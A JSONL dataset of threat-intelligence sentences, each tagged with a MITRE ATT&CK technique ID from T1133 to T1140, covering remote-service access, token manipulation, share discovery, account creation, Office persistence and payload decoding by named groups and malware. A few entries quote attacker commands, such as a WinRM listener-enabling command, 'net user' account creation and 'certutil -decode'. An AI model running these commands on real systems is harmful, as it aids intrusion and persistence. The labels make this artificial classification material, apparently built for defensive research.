{"text1":"APT41 compromised an online billing\/payment service using VPN access between a third-party service provider and the targeted payment service.","labels":"['T1133']"}
{"text1":"Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services.","labels":"['T1133']"}
{"text1":"Doki was executed through an open Docker daemon API port.","labels":"['T1133']"}
{"text1":"Dragonfly 2.0 used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.","labels":"['T1133']"}
{"text1":"Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.","labels":"['T1133']"}
{"text1":"Dragonfly used remote access services, including VPN and Outlook Web Access (OWA).","labels":"['T1133']"}
{"text1":"During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.","labels":"['T1133']"}
{"text1":"During Operation CuckooBees, the threat actors enabled WinRM over HTTP\/HTTPS as a backup persistence mechanism using the following command: `cscript \/\/nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm\/config\/service@{EnableCompatibilityHttpsListener=\"true\"}`.","labels":"['T1133']"}
{"text1":"During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN.","labels":"['T1133']"}
{"text1":"GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments.","labels":"['T1133']"}
{"text1":"GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines.","labels":"['T1133']"}
{"text1":"Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates.","labels":"['T1133']"}
{"text1":"Kimsuky has used RDP to establish persistence.","labels":"['T1133']"}
{"text1":"LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix.","labels":"['T1133']"}
{"text1":"Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access.","labels":"['T1133']"}
{"text1":"Linux Rabbit attempts to gain access to the server via SSH.","labels":"['T1133']"}
{"text1":"OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment.","labels":"['T1133']"}
{"text1":"Operation Wocao has used stolen credentials to connect to the victim's network via VPN.","labels":"['T1133']"}
{"text1":"Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.","labels":"['T1133']"}
{"text1":"TEMP.Veles has used a VPN to persist in the victim environment.","labels":"['T1133']"}
{"text1":"TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments.","labels":"['T1133']"}
{"text1":"Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.","labels":"['T1133']"}
{"text1":"UNC2452 has used compromised identities to access VPNs and remote access tools.","labels":"['T1133']"}
{"text1":"AppleSeed can gain system level privilege by passing \"SeDebugPrivilege\" to the \"AdjustTokenPrivilege\" API.","labels":"['T1134']"}
{"text1":"Blue Mockingbird has used JuicyPotato to abuse the \"SeImpersonate\" token privilege to escalate from web application pool accounts to NT Authority\\SYSTEM.","labels":"['T1134']"}
{"text1":"Duqu examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.","labels":"['T1134']"}
{"text1":"Empire can use PowerSploit's \"Invoke-TokenManipulation\" to manipulate access tokens.","labels":"['T1134']"}
{"text1":"FIN6 has used has used Metasploit\u2019s named-pipe impersonation technique to escalate privileges.","labels":"['T1134']"}
{"text1":"Gelsemium can use token manipulation to bypass UAC on Windows7 systems.","labels":"['T1134']"}
{"text1":"HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`.","labels":"['T1134']"}
{"text1":"Hydraq creates a backdoor through which remote attackers can adjust token privileges.","labels":"['T1134']"}
{"text1":"PowerSploit's \"Invoke-TokenManipulation\" Exfiltration module can be used to manipulate tokens.","labels":"['T1134']"}
{"text1":"Ryuk has attempted to adjust its token privileges to have the \"SeDebugPrivilege\".","labels":"['T1134']"}
{"text1":"SUNSPOT modified its security token to grants itself debugging privileges by adding \"SeDebugPrivilege\".","labels":"['T1134']"}
{"text1":"Sliver has the ability to manipulate user tokens on targeted Windows systems.","labels":"['T1134']"}
{"text1":"SslMM contains a feature to manipulate process privileges and tokens.","labels":"['T1134']"}
{"text1":"APT28 has used CVE-2015-1701 to access the SYSTEM token and copy it into the current process as part of privilege escalation.","labels":"['T1134.001']"}
{"text1":"BitPaymer can use the tokens of users to create processes on infected systems.","labels":"['T1134.001']"}
{"text1":"Cobalt Strike can steal access tokens from exiting processes.","labels":"['T1134.001']"}
{"text1":"FinFisher uses token manipulation with NtFilterToken as part of UAC bypass.","labels":"['T1134.001']"}
{"text1":"Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.","labels":"['T1134.001']"}
{"text1":"Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.","labels":"['T1134.001']"}
{"text1":"SILENTTRINITY can find a process owned by a specific user and impersonate the associated token.","labels":"['T1134.001']"}
{"text1":"Shamoon can impersonate tokens using \"LogonUser\", \"ImpersonateLoggedOnUser\", and \"ImpersonateNamedPipeClient\".","labels":"['T1134.001']"}
{"text1":"Siloscape impersonates the main thread of \"CExecSvc.exe\" by calling \"NtImpersonateThread\".","labels":"['T1134.001']"}
{"text1":"Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.","labels":"['T1134.001']"}
{"text1":"Tarrask leverages token theft to obtain `lsass.exe` security permissions.","labels":"['T1134.001']"}
{"text1":"Aria-body has the ability to execute a process using \"runas\".","labels":"['T1134.002']"}
{"text1":"Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.","labels":"['T1134.002']"}
{"text1":"Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.","labels":"['T1134.002']"}
{"text1":"KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.","labels":"['T1134.002']"}
{"text1":"Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call \"CreateProcessAsUserA\" under that user's context.","labels":"['T1134.002']"}
{"text1":"PipeMon can attempt to gain administrative privileges using token impersonation.","labels":"['T1134.002']"}
{"text1":"PoshC2 can use Invoke-RunAs to make tokens.","labels":"['T1134.002']"}
{"text1":"REvil can launch an instance of itself with administrative rights using runas.","labels":"['T1134.002']"}
{"text1":"ZxShell has a command called RunAs, which creates a new process as another user or process context.","labels":"['T1134.002']"}
{"text1":"Cobalt Strike can make tokens from known credentials.","labels":"['T1134.003']"}
{"text1":"Cobalt Strike can spawn processes with alternate PPIDs.","labels":"['T1134.004']"}
{"text1":"KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.","labels":"['T1134.004']"}
{"text1":"Empire can add a SID-History to a user if on a domain controller.","labels":"['T1134.005']"}
{"text1":"Mimikatz's \"MISC::AddSid\" module can appended any SID or user\/group account to a user's SID-History. Mimikatz also utilizes SID-History Injection to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.","labels":"['T1134.005']"}
{"text1":"APT1 listed connected network shares.","labels":"['T1135']"}
{"text1":"APT32 used the \"net view\" command to show all shares available, including the administrative shares such as \"C$\" and \"ADMIN$\".","labels":"['T1135']"}
{"text1":"APT38 has enumerated network shares on a compromised host.","labels":"['T1135']"}
{"text1":"APT39 has used the post exploitation tool CrackMapExec to enumerate network shares.","labels":"['T1135']"}
{"text1":"APT41 used the \"net share\" command as part of network reconnaissance.","labels":"['T1135']"}
{"text1":"Avaddon has enumerated shared folders and mapped volumes.","labels":"['T1135']"}
{"text1":"Bazar can enumerate shared drives on the domain.","labels":"['T1135']"}
{"text1":"Chimera has used \"net share\" and \"net view\" to identify network shares of interest.","labels":"['T1135']"}
{"text1":"Clambling has the ability to enumerate network shares.","labels":"['T1135']"}
{"text1":"Cobalt Strike can query shared drives on the local system.","labels":"['T1135']"}
{"text1":"Conti can enumerate remote open SMB network shares using \"NetShareEnum()\".","labels":"['T1135']"}
{"text1":"Cuba can discover shared resources using the \"NetShareEnum\" API call.","labels":"['T1135']"}
{"text1":"DarkVishnya scanned the network for public shared folders.","labels":"['T1135']"}
{"text1":"During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance.","labels":"['T1135']"}
{"text1":"During Operation Wocao, threat actors discovered network disks mounted to the system using netstat.","labels":"['T1135']"}
{"text1":"Empire can find shared drives on the local system.","labels":"['T1135']"}
{"text1":"FIVEHANDS can enumerate network shares and mounted drives on a network.","labels":"['T1135']"}
{"text1":"HELLOKITTY has the ability to enumerate network resources.","labels":"['T1135']"}
{"text1":"Koadic can scan local network for open SMB.","labels":"['T1135']"}
{"text1":"Kwampirs collects a list of network shares with the command \"net share\".","labels":"['T1135']"}
{"text1":"Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.","labels":"['T1135']"}
{"text1":"PlugX has a module to enumerate network shares.","labels":"['T1135']"}
{"text1":"Pupy can list local and remote shared drives and folders over SMB.","labels":"['T1135']"}
{"text1":"QakBot can use \"net share\" to identify network shares for use in lateral movement.","labels":"['T1135']"}
{"text1":"QuietSieve can identify and search networked drives for specific file name extensions.","labels":"['T1135']"}
{"text1":"SILENTTRINITY can enumerate shares on a compromised host.","labels":"['T1135']"}
{"text1":"Stuxnet enumerates the directories of a network resource.","labels":"['T1135']"}
{"text1":"The \"net view \\\\remotesystem\" and \"net share\" commands in Net can be used to find shared drives and directories on remote and local systems respectively.","labels":"['T1135']"}
{"text1":"Tonto Team has used tools such as NBTscan to enumerate network shares.","labels":"['T1135']"}
{"text1":"TrickBot module shareDll\/mshareDll discovers network shares via the WNetOpenEnumA API.","labels":"['T1135']"}
{"text1":"Tropic Trooper used \"netview\" to scan target systems for shared resources.","labels":"['T1135']"}
{"text1":"WastedLocker can identify network adjacent and accessible drives.","labels":"['T1135']"}
{"text1":"WhisperGate can enumerate connected remote logical drives.","labels":"['T1135']"}
{"text1":"Wizard Spider has used the \u201cnet view\u201d command to locate mapped network shares.","labels":"['T1135']"}
{"text1":"Zebrocy identifies network drives when they are added to victim systems.","labels":"['T1135']"}
{"text1":"Dragonfly created accounts that appeared to be tailored to each individual staging target.","labels":"['T1136']"}
{"text1":"Indrik Spider used \"wmic.exe\" to add a new user to the system.","labels":"['T1136']"}
{"text1":"Sandworm Team added a login to a SQL Server with \"sp_addlinkedsrvlogin\".","labels":"['T1136']"}
{"text1":"APT3 has been known to create or enable accounts, such as \"support_388945a0\".","labels":"['T1136.001']"}
{"text1":"APT39 has created accounts on multiple compromised hosts to perform actions within the network.","labels":"['T1136.001']"}
{"text1":"APT41 created user accounts and adds them to the User and Admin groups.","labels":"['T1136.001']"}
{"text1":"Carbanak can create a Windows account.","labels":"['T1136.001']"}
{"text1":"Dragonfly 2.0 created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.","labels":"['T1136.001']"}
{"text1":"Flame can create backdoor accounts with login \u201cHelpAssistant\u201d on domain connected systems if appropriate rights are available.","labels":"['T1136.001']"}
{"text1":"Fox Kitten has created a local user account with administrator privileges.","labels":"['T1136.001']"}
{"text1":"GoldenSpy can create new users on an infected system.","labels":"['T1136.001']"}
{"text1":"Hildegard has created a user named \u201cmonerodaemon\u201d.","labels":"['T1136.001']"}
{"text1":"Kimsuky has created accounts with \"net user\".","labels":"['T1136.001']"}
{"text1":"Leafminer used a tool called Imecab to set up a persistent remote access account on the victim machine.","labels":"['T1136.001']"}
{"text1":"Magic Hound has created a user named `DefaultAccount` on compromised machines and assigned it to the Administrators and Remote Desktop Users groups.","labels":"['T1136.001']"}
{"text1":"Mis-Type may create a temporary user on the system named `Lost_{Unique Identifier}`.","labels":"['T1136.001']"}
{"text1":"Pupy can user PowerView to execute \u201cnet user\u201d commands and create local system accounts.","labels":"['T1136.001']"}
{"text1":"SMOKEDHAM has created user accounts and added them to local Admin groups.","labels":"['T1136.001']"}
{"text1":"ServHelper has created a new user and added it to the \"Remote Desktop Users\" and \"Administrators\" groups.","labels":"['T1136.001']"}
{"text1":"TeamTNT has created local privileged users on victim machines.","labels":"['T1136.001']"}
{"text1":"The \"net user username \\password\" commands in Net can be used to create a local account.","labels":"['T1136.001']"}
{"text1":"ZxShell has a feature to create local user accounts.","labels":"['T1136.001']"}
{"text1":"HAFNIUM has created and granted privileges to domain accounts.","labels":"['T1136.002']"}
{"text1":"PsExec has the ability to remotely create accounts on target systems.","labels":"['T1136.002']"}
{"text1":"Pupy can user PowerView to execute \u201cnet user\u201d commands and create domain accounts.","labels":"['T1136.002']"}
{"text1":"Sandworm Team has created new domain accounts on an ICS access server.","labels":"['T1136.002']"}
{"text1":"The \"net user username \\password \\domain\" commands in Net can be used to create a domain account.","labels":"['T1136.002']"}
{"text1":"APT29 can create new users through Azure AD.","labels":"['T1136.003']"}
{"text1":"APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.","labels":"['T1137']"}
{"text1":"Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the \"\/altvba\" option, once the Application.Startup event is received.","labels":"['T1137']"}
{"text1":"Ruler can be used to automate the abuse of Outlook Rules, Forms, and Home Pages to establish persistence.","labels":"['T1137']"}
{"text1":"BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.","labels":"['T1137.001']"}
{"text1":"Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.","labels":"['T1137.001']"}
{"text1":"MuddyWater has used a Word Template, Normal.dotm, for persistence.","labels":"['T1137.001']"}
{"text1":"APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key \"HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\" to execute code.","labels":"['T1137.002']"}
{"text1":"OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.","labels":"['T1137.004']"}
{"text1":"Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence.","labels":"['T1137.004']"}
{"text1":"Bisonal has been loaded through a `.wll` extension added to the ` %APPDATA%\\microsoft\\word\\startup\\` repository.","labels":"['T1137.006']"}
{"text1":"Naikon has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.","labels":"['T1137.006']"}
{"text1":"ABK has the ability to decrypt AES encrypted payloads.","labels":"['T1140']"}
{"text1":"APT29 used 7-Zip to decode its Raindrop malware.","labels":"['T1140']"}
{"text1":"APT34 has used certutil to decode base64-encoded files on victims.","labels":"['T1140']"}
{"text1":"APT39 has used malware to decrypt encrypted CAB files.","labels":"['T1140']"}
{"text1":"Agent Tesla has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.","labels":"['T1140']"}
{"text1":"Amadey has decoded antivirus name strings.","labels":"['T1140']"}
{"text1":"An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.","labels":"['T1140']"}
{"text1":"An APT28 macro uses the command \"certutil -decode\" to decode contents of a .txt file storing the base64 encoded payload.","labels":"['T1140']"}
{"text1":"AppleSeed can decode its payload prior to execution.","labels":"['T1140']"}
{"text1":"Aria-body has the ability to decrypt the loader configuration and payload DLL.","labels":"['T1140']"}
{"text1":"Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code.","labels":"['T1140']"}
{"text1":"AuditCred uses XOR and RC4 to perform decryption on the code functions.","labels":"['T1140']"}
{"text1":"Avaddon has decrypted encrypted strings.","labels":"['T1140']"}
{"text1":"Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address.","labels":"['T1140']"}
{"text1":"BADFLICK can decode shellcode using a custom rotating XOR cipher.","labels":"['T1140']"}
{"text1":"BBK has the ability to decrypt AES encrypted payloads.","labels":"['T1140']"}
{"text1":"BBSRAT uses Expand to decompress a CAB file into executable content.","labels":"['T1140']"}
{"text1":"BLINDINGCAN has used AES and XOR to decrypt its DLLs.","labels":"['T1140']"}
{"text1":"BRONZE BUTLER downloads encoded payloads and decodes them on the victim.","labels":"['T1140']"}
{"text1":"Babuk has the ability to unpack itself into memory using XOR.","labels":"['T1140']"}
{"text1":"BabyShark has the ability to decode downloaded files prior to execution.","labels":"['T1140']"}
{"text1":"BackConfig has used a custom routine to decrypt strings.","labels":"['T1140']"}
{"text1":"Bandook has decoded its PowerShell script.","labels":"['T1140']"}
{"text1":"Bankshot decodes embedded XOR strings.","labels":"['T1140']"}
{"text1":"Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime.","labels":"['T1140']"}
{"text1":"Bisonal has decoded strings in the malware using XOR and RC4.","labels":"['T1140']"}
{"text1":"BoomBox can decrypt AES-encrypted files downloaded from C2.","labels":"['T1140']"}
{"text1":"Bumblebee can deobfuscate C2 server responses and unpack its code on targeted hosts.","labels":"['T1140']"}
{"text1":"Bundlore has used \"openssl\" to decrypt AES encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.","labels":"['T1140']"}
{"text1":"Carbon decrypts task and configuration files for execution.","labels":"['T1140']"}
{"text1":"Cardinal RAT decodes many of its artifacts and is decrypted (AES-128) after being downloaded.","labels":"['T1140']"}
{"text1":"Chaes has decrypted an AES encrypted binary file to trigger the download of other files.","labels":"['T1140']"}
{"text1":"CharmPower can decrypt downloaded modules prior to execution.","labels":"['T1140']"}
{"text1":"Chrommme can decrypt its encrypted internal code.","labels":"['T1140']"}
{"text1":"Clambling can deobfuscate its payload prior to execution.","labels":"['T1140']"}
{"text1":"Clop has used a simple XOR operation to decrypt strings.","labels":"['T1140']"}
{"text1":"Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.","labels":"['T1140']"}
{"text1":"CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL.","labels":"['T1140']"}
{"text1":"CookieMiner has used Google Chrome's decryption and extraction operations.","labels":"['T1140']"}
{"text1":"Crimson can decode its encoded PE file prior to execution.","labels":"['T1140']"}
{"text1":"Cyclops Blink can decrypt and parse instructions sent from C2.","labels":"['T1140']"}
{"text1":"DDKONG decodes an embedded configuration using XOR.","labels":"['T1140']"}
{"text1":"DarkWatchman has the ability to self-extract as a RAR archive.","labels":"['T1140']"}
{"text1":"Darkhotel has decrypted strings and imports using RC4 during execution.","labels":"['T1140']"}
{"text1":"Denis will decrypt important strings used for C&C communication.","labels":"['T1140']"}
{"text1":"Drovorub has de-obsfuscated XOR encrypted payloads in WebSocket messages.","labels":"['T1140']"}
{"text1":"Dtrack has used a decryption routine that is part of an executable physical patch.","labels":"['T1140']"}
{"text1":"During Frankenstein, the threat actors deobfuscated Base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.","labels":"['T1140']"}
{"text1":"During Operation Dust Storm, attackers used VBS code to decode payloads.","labels":"['T1140']"}
{"text1":"During Operation Honeybee, malicious files were decoded prior to execution.","labels":"['T1140']"}
{"text1":"During execution, Threat Group-3390 malware deobfuscates and decompresses code that was encoded with Metasploit\u2019s shikata_ga_nai encoder as well as compressed with LZNT1 compression.","labels":"['T1140']"}
{"text1":"Earth Lusca has used certutil to decode a string into a cabinet file.","labels":"['T1140']"}
{"text1":"Ebury has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.","labels":"['T1140']"}
{"text1":"Ecipekac has the ability to decrypt fileless loader modules.","labels":"['T1140']"}
{"text1":"Egregor has been decrypted before execution.","labels":"['T1140']"}
{"text1":"Exaramel for Linux can decrypt its configuration file.","labels":"['T1140']"}
{"text1":"Expand can be used to decompress a local or remote CAB file into an executable.","labels":"['T1140']"}
{"text1":"FatDuke can decrypt AES encrypted C2 communications.","labels":"['T1140']"}
{"text1":"FinFisher extracts and decrypts stage 3 malware, which is stored in encrypted resources.","labels":"['T1140']"}
{"text1":"For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads.","labels":"['T1140']"}
{"text1":"Gelsemium can decompress and decrypt DLLs and shellcode.","labels":"['T1140']"}
{"text1":"GoldMax has decoded and decrypted the configuration file when executed.","labels":"['T1140']"}
{"text1":"Goopy has used a polymorphic decryptor to decrypt itself at runtime.","labels":"['T1140']"}
{"text1":"Green Lambert can use multiple custom routines to decrypt strings prior to execution.","labels":"['T1140']"}
{"text1":"GrimAgent can use a decryption algorithm for strings based on Rotate on Right (RoR) and Rotate on Left (RoL) functionality.","labels":"['T1140']"}
{"text1":"Hancitor has decoded Base64 encoded URLs to insert a recipient\u2019s name into the filename of the Word document. Hancitor has also extracted executables from ZIP files.","labels":"['T1140']"}
{"text1":"HermeticWiper can decompress and copy driver files using `LZCopy`.","labels":"['T1140']"}
{"text1":"Heyoka Backdoor can decrypt its payload prior to execution.","labels":"['T1140']"}
{"text1":"Hildegard has decrypted ELF files with AES.","labels":"['T1140']"}
{"text1":"Honeybee drops a Word file containing a Base64-encoded file in it that is read, decoded, and dropped to the disk by the macro.","labels":"['T1140']"}
{"text1":"IceApple can use a Base64-encoded AES key to decrypt tasking.","labels":"['T1140']"}
{"text1":"Industroyer decrypts code to connect to a remote C2 server.","labels":"['T1140']"}
{"text1":"InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.","labels":"['T1140']"}
{"text1":"IronNetInjector has the ability to decrypt embedded .NET and PE payloads.","labels":"['T1140']"}
{"text1":"KGH_SPY can decrypt encrypted strings and write them to a newly created folder.","labels":"['T1140']"}
{"text1":"KOCTOPUS has deobfuscated itself before executing its commands.","labels":"['T1140']"}
{"text1":"Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them.","labels":"['T1140']"}
{"text1":"Kerrdown can decode, decrypt, and decompress multiple layers of shellcode.","labels":"['T1140']"}
{"text1":"Kessel has decrypted the binary's configuration once the \"main\" function was launched.","labels":"['T1140']"}
{"text1":"Kobalos decrypts strings right after the initial communication, but before the authentication process.","labels":"['T1140']"}
{"text1":"Kwampirs decrypts and extracts a copy of its main DLL payload when executing.","labels":"['T1140']"}
{"text1":"Lazarus Group has used shellcode within macros to decrypt and manually map DLLs and shellcode into memory at runtime.","labels":"['T1140']"}
{"text1":"Leviathan has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.","labels":"['T1140']"}
{"text1":"LightNeuron has used AES and XOR to decrypt configuration files and commands.","labels":"['T1140']"}
{"text1":"LiteDuke has the ability to decrypt and decode multiple layers of obfuscation.","labels":"['T1140']"}
{"text1":"Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.","labels":"['T1140']"}
{"text1":"Lucifer can decrypt its C2 address upon execution.","labels":"['T1140']"}
{"text1":"MacMa decrypts a downloaded file using AES-128-EBC with a custom delta.","labels":"['T1140']"}
{"text1":"MirageFox has a function for decrypting data containing C2 configuration information.","labels":"['T1140']"}
{"text1":"Molerats decompresses ZIP files once on the victim machine.","labels":"['T1140']"}
{"text1":"Mongall has the ability to decrypt its payload prior to execution.","labels":"['T1140']"}
{"text1":"Mori can resolve networking APIs from strings that are ADD-encrypted.","labels":"['T1140']"}
{"text1":"NativeZone can decrypt and decode embedded  Cobalt Strike beacon stage shellcode.","labels":"['T1140']"}
{"text1":"Netwalker's PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the Netwalker DLL being loaded into memory.","labels":"['T1140']"}
{"text1":"OSX\/Shlayer can base64-decode and AES-decrypt downloaded payloads. Versions of OSX\/Shlayer pass encrypted and password-protected code to \"openssl\" and then write the payload to the \"\/tmp\" folder.","labels":"['T1140']"}
{"text1":"Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.","labels":"['T1140']"}
{"text1":"One TYPEFRAME variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value \"0x35\".","labels":"['T1140']"}
{"text1":"OnionDuke can use a custom decryption algorithm to decrypt strings.","labels":"['T1140']"}
{"text1":"OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.","labels":"['T1140']"}
{"text1":"P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution.","labels":"['T1140']"}
{"text1":"PUNCHBUGGY has used PowerShell to decode base64-encoded assembly.","labels":"['T1140']"}
{"text1":"PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.","labels":"['T1140']"}
{"text1":"Pillowmint has been decompressed by included shellcode prior to being launched.","labels":"['T1140']"}
{"text1":"PlugX decompresses and decrypts itself using the Microsoft API call RtlDecompressBuffer.","labels":"['T1140']"}
{"text1":"PoetRAT has used LZMA and base64 libraries to decode obfuscated scripts.","labels":"['T1140']"}
{"text1":"Proton uses an encrypted file to store commands and configuration values.","labels":"['T1140']"}
{"text1":"Pteranodon can decrypt encrypted data strings prior to using them.","labels":"['T1140']"}
{"text1":"PyDCrypt has decrypted and dropped the DCSrv payload to disk.","labels":"['T1140']"}
{"text1":"QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.","labels":"['T1140']"}
{"text1":"QakBot can deobfuscate and re-assemble code strings for execution.","labels":"['T1140']"}
{"text1":"RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.","labels":"['T1140']"}
{"text1":"REvil can decode encrypted strings to enable execution of commands and payloads.","labels":"['T1140']"}
{"text1":"RGDoor decodes Base64 strings and decrypts strings using a custom XOR algorithm.","labels":"['T1140']"}
{"text1":"ROKRAT can decrypt strings using the victim's hostname as the key.","labels":"['T1140']"}
{"text1":"Raindrop decrypted its Cobalt Strike payload using an AES-256 encryption algorithm in CBC mode with a unique key per sample.","labels":"['T1140']"}
{"text1":"Ramsay can extract its agent from the body of a malicious document.","labels":"['T1140']"}
{"text1":"RegDuke can decrypt strings with a key either stored in the Registry or hardcoded in the code.","labels":"['T1140']"}
{"text1":"Rising Sun has decrypted itself using a single-byte XOR scheme. Additionally, Rising Sun can decrypt its configuration data at runtime.","labels":"['T1140']"}
{"text1":"RogueRobin decodes an embedded executable using base64 and decompresses it.","labels":"['T1140']"}
{"text1":"SDBbot has the ability to decrypt and decompress its payload to enable code execution.","labels":"['T1140']"}
{"text1":"SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs.","labels":"['T1140']"}
{"text1":"Saint Bot can deobfuscate strings and files for execution.","labels":"['T1140']"}
{"text1":"Sandworm Team's VBS backdoor can decode Base64-encoded data and save it to the %TEMP% folder. The group also decrypted received information using the Triple DES algorithm and decompresses it using GZip.","labels":"['T1140']"}
{"text1":"ShadowPad has decrypted a binary blob to start execution.","labels":"['T1140']"}
{"text1":"ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.","labels":"['T1140']"}
{"text1":"Sibot can decrypt data received from a C2 and save to a file.","labels":"['T1140']"}
{"text1":"Skidmap has the ability to download, unpack, and decrypt tar.gz files .","labels":"['T1140']"}
{"text1":"Smoke Loader deobfuscates its code.","labels":"['T1140']"}
{"text1":"SombRAT can run \"upload\" to decrypt and upload files from storage.","labels":"['T1140']"}
{"text1":"SoreFang can decode and decrypt exfiltrated data sent to C2.","labels":"['T1140']"}
{"text1":"Spark has used a custom XOR algorithm to decrypt the payload.","labels":"['T1140']"}
{"text1":"Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm.","labels":"['T1140']"}
{"text1":"SysUpdate can deobfuscate packed binaries in memory.","labels":"['T1140']"}
{"text1":"TA505 has decrypted packed DLLs with an XOR key.","labels":"['T1140']"}
{"text1":"TEARDROP was decoded using a custom rolling XOR algorithm to execute a customized Cobalt Strike payload.","labels":"['T1140']"}
{"text1":"TSCookie has the ability to decrypt, load, and execute a DLL and its resources.","labels":"['T1140']"}
{"text1":"Taidoor can use a stream cipher to decrypt stings used by the malware.","labels":"['T1140']"}
{"text1":"TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope.","labels":"['T1140']"}
{"text1":"The Chinoxy dropping function can initiate decryption of its config file.","labels":"['T1140']"}
{"text1":"ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing.","labels":"['T1140']"}
{"text1":"Tropic Trooper used shellcode with an XOR algorithm to decrypt a payload. Tropic Trooper also decrypted image files which contained a payload.","labels":"['T1140']"}
{"text1":"Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.","labels":"['T1140']"}
{"text1":"Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads.","labels":"['T1140']"}
{"text1":"Upon execution, Metamorfo has unzipped itself after being downloaded to the system and has performed string decryption.","labels":"['T1140']"}
{"text1":"Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.","labels":"['T1140']"}
{"text1":"VaporRage can deobfuscate XOR-encoded shellcode prior to execution.","labels":"['T1140']"}
{"text1":"Volgmer deobfuscates its strings and APIs once its executed.","labels":"['T1140']"}
{"text1":"WIRTE has used Base64 to decode malicious VBS script.","labels":"['T1140']"}
{"text1":"WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload.","labels":"['T1140']"}
{"text1":"Waterbear has the ability to decrypt its RC4 encrypted payload for execution.","labels":"['T1140']"}
{"text1":"WellMail can decompress scripts received from C2.","labels":"['T1140']"}
